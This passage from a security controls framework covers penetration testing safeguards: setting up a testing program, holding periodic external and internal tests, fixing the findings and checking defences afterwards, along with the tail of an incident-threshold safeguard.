Establish and maintain security incident thresholds, including, at a minimum, differentiating between an incident and an event. Examples can include: abnormal activity, security vulnerability, security weakness, data breach, privacy incident, etc. Review annually, or when significant enterprise changes occur that could impact this Safeguard.

18 Penetration Testing
Test the effectiveness and resiliency of enterprise assets through identifying and exploiting weaknesses in controls (people, processes, and technology), and simulating the objectives and actions of an attacker.

18.1 Establish and Maintain a Penetration Testing Program N/A -Identify- ••
Establish and maintain a penetration testing program appropriate to the size, complexity, and maturity of the enterprise. Penetration testing program characteristics include scope, such as network, web application, Application Programming Interface (API), hosted services, and physical premise controls; frequency; limitations, such as acceptable hours, and excluded attack types; point of contact information; remediation, such as how findings will be routed internally; and retrospective requirements.

18.2 Perform Periodic External Penetration Tests Network -Identify- ••
Perform periodic external penetration tests based on program requirements, no less than annually. External penetration testing must include enterprise and environmental reconnaissance to detect exploitable information. Penetration testing requires specialized skills and experience and must be conducted through a qualified party. The testing may be clear box or opaque box.

18.3 Remediate Penetration Test Findings Network -Protect- ••
Remediate penetration test findings based on the enterprise’s policy for remediation scope and prioritization.

18.4 Validate Security Measures Network -Protect- ••
Validate security measures after each penetration test. If deemed necessary, modify rulesets and capabilities to detect the techniques used during testing.

18.5 Perform Periodic Internal Penetration Tests N/A -Identify- •
Perform periodic internal penetration tests based on program requirements, no less than annually. The testing may be clear box or opaque box.